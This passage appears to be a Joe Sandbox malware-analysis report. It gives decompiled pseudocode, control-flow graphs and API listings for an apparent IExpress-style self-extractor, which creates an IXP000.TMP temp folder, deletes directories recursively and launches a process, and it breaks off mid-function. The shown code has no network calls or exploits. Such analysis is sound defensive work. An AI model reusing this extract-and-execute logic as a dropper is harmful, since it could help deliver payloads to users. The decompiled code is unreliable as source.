                                                                        control_flow_graph 406 a32f1d-a32f3d 407 a32f3f-a32f46 406->407 408 a32f6c-a32f73 call a35164 406->408 409 a32f48 call a351e5 407->409 410 a32f5f-a32f66 call a33a3f 407->410 417 a33041 408->417 418 a32f79-a32f80 call a355a0 408->418 415 a32f4d-a32f4f 409->415 410->408 410->417 415->417 420 a32f55-a32f5d 415->420 419 a33043-a33053 call a36ce0 417->419 418->417 424 a32f86-a32fbe GetSystemDirectoryA call a3658a LoadLibraryA 418->424 420->408 420->410 428 a32fc0-a32fd4 GetProcAddress 424->428 429 a32ff7-a33004 FreeLibrary 424->429 428->429 430 a32fd6-a32fee DecryptFileA 428->430 431 a33017-a33024 SetCurrentDirectoryA 429->431 432 a33006-a3300c 429->432 430->429 442 a32ff0-a32ff5 430->442 434 a33026-a3303c call a344b9 call a36285 431->434 435 a33054-a3305a 431->435 432->431 433 a3300e call a3621e 432->433 446 a33013-a33015 433->446 434->417 438 a33065-a3306c 435->438 439 a3305c call a33b26 435->439 444 a3306e-a33075 call a3256d 438->444 445 a3307c-a33089 438->445 450 a33061-a33063 439->450 442->429 456 a3307a 444->456 447 a330a1-a330a9 445->447 448 a3308b-a33091 445->448 446->417 446->431 454 a330b4-a330b7 447->454 455 a330ab-a330ad 447->455 448->447 452 a33093 call a33ba2 448->452 450->417 450->438 459 a33098-a3309a 452->459 454->419 455->454 458 a330af call a34169 455->458 456->445 458->454 459->417 461 a3309c 459->461 461->447
                                                                        C-Code - Quality: 82%
                                                                        			E00A32F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0xa38a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E00A35164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E00A36CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E00A355A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E00A3658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0xa3a288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0xa38a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0xa38a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0xa38d48 & 0x000000c0;
                                                                        									if(( *0xa38d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0xa39a40; // 0x3, executed
                                                                        										_t26 = E00A3256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0xa38a24; // 0x0
                                                                        									 *0xa39a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0xa38a38;
                                                                        										if( *0xa38a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E00A34169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0xa39a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E00A33BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0xa38a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E00A33B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E00A344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0xa39124 = E00A36285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0xa39a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E00A3621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0xa38a24;
                                                                        				if( *0xa38a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E00A33A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E00A351E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0xa38a38;
                                                                        				if( *0xa38a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}




























                                                                        0x00a32f1d
                                                                        0x00a32f28
                                                                        0x00a32f2f
                                                                        0x00a32f3d
                                                                        0x00a32f6c
                                                                        0x00a32f6c
                                                                        0x00a32f71
                                                                        0x00a32f73
                                                                        0x00a33041
                                                                        0x00a33041
                                                                        0x00a33043
                                                                        0x00a33053
                                                                        0x00a33053
                                                                        0x00a32f79
                                                                        0x00a32f80
                                                                        0x00000000
                                                                        0x00a32f86
                                                                        0x00a32f86
                                                                        0x00a32f93
                                                                        0x00a32f9e
                                                                        0x00a32fa0
                                                                        0x00a32fa6
                                                                        0x00a32fb8
                                                                        0x00a32fba
                                                                        0x00a32fbe
                                                                        0x00a32fc6
                                                                        0x00a32fcc
                                                                        0x00a32fd4
                                                                        0x00a32fd6
                                                                        0x00a32fd8
                                                                        0x00a32fe0
                                                                        0x00a32fe6
                                                                        0x00a32fee
                                                                        0x00a32ff0
                                                                        0x00a32ff5
                                                                        0x00a32ff5
                                                                        0x00a32fee
                                                                        0x00a32fd4
                                                                        0x00a32ff8
                                                                        0x00a32ffe
                                                                        0x00a33004
                                                                        0x00a33017
                                                                        0x00a3301c
                                                                        0x00a33024
                                                                        0x00a33054
                                                                        0x00a3305a
                                                                        0x00a33065
                                                                        0x00a33065
                                                                        0x00a3306c
                                                                        0x00a3306e
                                                                        0x00a33075
                                                                        0x00a3307a
                                                                        0x00a3307a
                                                                        0x00a3307c
                                                                        0x00a33081
                                                                        0x00a33087
                                                                        0x00a33089
                                                                        0x00a330a1
                                                                        0x00a330a1
                                                                        0x00a330a9
                                                                        0x00a330ab
                                                                        0x00a330ad
                                                                        0x00a330af
                                                                        0x00a330af
                                                                        0x00a330ad
                                                                        0x00a330b6
                                                                        0x00000000
                                                                        0x00a3308b
                                                                        0x00a3308b
                                                                        0x00a33091
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33093
                                                                        0x00a33098
                                                                        0x00a3309a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3309c
                                                                        0x00000000
                                                                        0x00a3309c
                                                                        0x00a33089
                                                                        0x00a3305c
                                                                        0x00a33061
                                                                        0x00a33063
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33063
                                                                        0x00a3302b
                                                                        0x00a33032
                                                                        0x00a3303c
                                                                        0x00000000
                                                                        0x00a3303c
                                                                        0x00a33006
                                                                        0x00a3300c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3300e
                                                                        0x00a33015
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33015
                                                                        0x00a32f80
                                                                        0x00a32f3f
                                                                        0x00a32f46
                                                                        0x00a32f5f
                                                                        0x00a32f5f
                                                                        0x00a32f64
                                                                        0x00a32f66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32f66
                                                                        0x00a32f4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32f55
                                                                        0x00a32f5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A32F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A32FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A32FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 00A32FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A32FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3301C
                                                                          • Part of subcall function 00A351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A32F4D,?,00000002,00000000), ref: 00A35201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-3095882572
                                                                        • Opcode ID: 070f65c39bbadc041cd7734d50ebfb84130ed0d7b52a411d2f347de5982dd798
                                                                        • Instruction ID: 89121751d843bc3a697096bf4f974c66a87783918bcae11190ade0b5ad6550e2
                                                                        • Opcode Fuzzy Hash: 070f65c39bbadc041cd7734d50ebfb84130ed0d7b52a411d2f347de5982dd798
                                                                        • Instruction Fuzzy Hash: 33419632E04315ABDF38EBB5ED4676773A8AB56790F010165F941C2191EF78CE82CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 a35467-a35484 479 a3548a-a35490 call a353a1 478->479 480 a3551c-a35528 call a31680 478->480 483 a35495-a35497 479->483 484 a3552d-a35539 call a358c8 480->484 485 a35581-a35583 483->485 486 a3549d-a354c0 call a31781 483->486 493 a3553b-a35545 CreateDirectoryA 484->493 494 a3554d-a35552 484->494 488 a3558d-a3559d call a36ce0 485->488 495 a354c2-a354d8 GetSystemInfo 486->495 496 a3550c-a3551a call a3658a 486->496 498 a35577-a3557c call a36285 493->498 499 a35547 493->499 500 a35585-a3558b 494->500 501 a35554-a35557 call a3597d 494->501 504 a354da-a354dd 495->504 505 a354fe 495->505 496->484 498->485 499->494 500->488 512 a3555c-a3555e 501->512 510 a354f7-a354fc 504->510 511 a354df-a354e2 504->511 507 a35503-a35507 call a3658a 505->507 507->496 510->507 515 a354f0-a354f5 511->515 516 a354e4-a354e7 511->516 512->500 513 a35560-a35566 512->513 513->485 517 a35568-a35575 RemoveDirectoryA 513->517 515->507 516->496 518 a354e9-a354ee 516->518 517->485 518->507
                                                                        C-Code - Quality: 75%
                                                                        			E00A35467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0xa391e4;
                                                                        					_t42 = 0x104;
                                                                        					E00A31680(0xa391e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E00A358C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0xa39124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E00A36CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E00A3597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0xa38a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0xa38a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0xa39124 = E00A36285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0xa38a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E00A353A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0xa391e4;
                                                                        				E00A31781(0xa391e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0xa39a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E00A3658A(_t48, 0x104, 0xa31140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E00A3658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}




















                                                                        0x00a35472
                                                                        0x00a35479
                                                                        0x00a35481
                                                                        0x00a35484
                                                                        0x00a3551c
                                                                        0x00a35521
                                                                        0x00a35528
                                                                        0x00a3552d
                                                                        0x00a3552f
                                                                        0x00a35539
                                                                        0x00a3554d
                                                                        0x00a3554d
                                                                        0x00a35552
                                                                        0x00a35585
                                                                        0x00a35585
                                                                        0x00a3558b
                                                                        0x00a3558d
                                                                        0x00a3559d
                                                                        0x00a3559d
                                                                        0x00a35557
                                                                        0x00a3555e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35560
                                                                        0x00a35566
                                                                        0x00a35569
                                                                        0x00a3556f
                                                                        0x00a3556f
                                                                        0x00a35581
                                                                        0x00a35581
                                                                        0x00000000
                                                                        0x00a35581
                                                                        0x00a35545
                                                                        0x00a3557c
                                                                        0x00000000
                                                                        0x00a3557c
                                                                        0x00a35547
                                                                        0x00000000
                                                                        0x00a35547
                                                                        0x00a3548a
                                                                        0x00a35490
                                                                        0x00a35497
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3549d
                                                                        0x00a354ab
                                                                        0x00a354b4
                                                                        0x00a354c0
                                                                        0x00a3550c
                                                                        0x00a35511
                                                                        0x00a35515
                                                                        0x00000000
                                                                        0x00a35515
                                                                        0x00a354c9
                                                                        0x00a354d6
                                                                        0x00a354d8
                                                                        0x00a354fe
                                                                        0x00a35503
                                                                        0x00a35507
                                                                        0x00000000
                                                                        0x00a35507
                                                                        0x00a354da
                                                                        0x00a354dd
                                                                        0x00a354f7
                                                                        0x00000000
                                                                        0x00a354f7
                                                                        0x00a354df
                                                                        0x00a354e2
                                                                        0x00a354f0
                                                                        0x00000000
                                                                        0x00a354f0
                                                                        0x00a354e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a354e9
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A354C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3556F
                                                                          • Part of subcall function 00A353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A353FB
                                                                          • Part of subcall function 00A353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35402
                                                                          • Part of subcall function 00A353A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3541F
                                                                          • Part of subcall function 00A353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3542B
                                                                          • Part of subcall function 00A353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-3881341942
                                                                        • Opcode ID: 5140abd72b92b45aaf5792eac7e358f7f3daf2ffe0862036f0fc8c9f551cd057
                                                                        • Instruction ID: b74544b7ea813a004a76d9290fdb9c4aeb1c4d1134a3cf66d5741f9fcbfae6e9
                                                                        • Opcode Fuzzy Hash: 5140abd72b92b45aaf5792eac7e358f7f3daf2ffe0862036f0fc8c9f551cd057
                                                                        • Instruction Fuzzy Hash: 5631F571F00A146BCB149FBDAD459BFB7ABBB91340F04412AF442D7550DBB4DE028691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00A32390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0xa38004; // 0xb6b6972c
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E00A36CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E00A31680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E00A316B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E00A31680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E00A316B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E00A316B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E00A3658A( &_v280, 0x104, 0xa31140);
                                                                        								E00A32390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}





















                                                                        0x00a32398
                                                                        0x00a3239e
                                                                        0x00a323a3
                                                                        0x00a323a5
                                                                        0x00a323ae
                                                                        0x00a323b3
                                                                        0x00a324cb
                                                                        0x00a324d2
                                                                        0x00a324d3
                                                                        0x00a324d4
                                                                        0x00a324df
                                                                        0x00a323c2
                                                                        0x00a323d1
                                                                        0x00a323db
                                                                        0x00a323e4
                                                                        0x00a323f6
                                                                        0x00a323fc
                                                                        0x00a32401
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32407
                                                                        0x00a32407
                                                                        0x00a32408
                                                                        0x00a32411
                                                                        0x00a3241f
                                                                        0x00a3247a
                                                                        0x00a32483
                                                                        0x00a32495
                                                                        0x00a324a3
                                                                        0x00a32421
                                                                        0x00a3242f
                                                                        0x00a32453
                                                                        0x00a3245d
                                                                        0x00a32466
                                                                        0x00a32472
                                                                        0x00a32472
                                                                        0x00a3242f
                                                                        0x00a324af
                                                                        0x00a324b5
                                                                        0x00a324be
                                                                        0x00a324c5
                                                                        0x00000000
                                                                        0x00a324c5

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,00A38A3A,00A311F4,00A38A3A,00000000,?,?), ref: 00A323F6
                                                                        • lstrcmpA.KERNEL32(?,00A311F8), ref: 00A32427
                                                                        • lstrcmpA.KERNEL32(?,00A311FC), ref: 00A3243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A32495
                                                                        • DeleteFileA.KERNEL32(?), ref: 00A324A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A324AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 00A324BE
                                                                        • RemoveDirectoryA.KERNELBASE(00A38A3A), ref: 00A324C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: 26dce44e717861f701e8936492a21d5c66e60d312968179231da111c73442e7a
                                                                        • Instruction ID: 28679144a012c0831553f048bc3d1ddfed6dd8d00131cc1bc636db099ff5c1ce
                                                                        • Opcode Fuzzy Hash: 26dce44e717861f701e8936492a21d5c66e60d312968179231da111c73442e7a
                                                                        • Instruction Fuzzy Hash: 1E318731604750ABC320DBA4DD8ABEBB3ECAFD5305F044A2DB59586190EB74D94DC752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 a33fef-a34010 632 a34016-a3403b CreateProcessA 631->632 633 a3410a-a3411a call a36ce0 631->633 634 a34041-a3406e WaitForSingleObject GetExitCodeProcess 632->634 635 a340c4-a34101 call a36285 GetLastError FormatMessageA call a344b9 632->635 638 a34091 call a3411b 634->638 639 a34070-a34077 634->639 649 a34106 635->649 646 a34096-a340b8 CloseHandle * 2 638->646 639->638 642 a34079-a3407b 639->642 642->638 645 a3407d-a34089 642->645 645->638 650 a3408b 645->650 647 a340ba-a340c0 646->647 648 a34108 646->648 647->648 651 a340c2 647->651 648->633 649->648 650->638 651->649
                                                                        C-Code - Quality: 84%
                                                                        			E00A33FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E00A36CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0xa39124 = E00A36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E00A344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
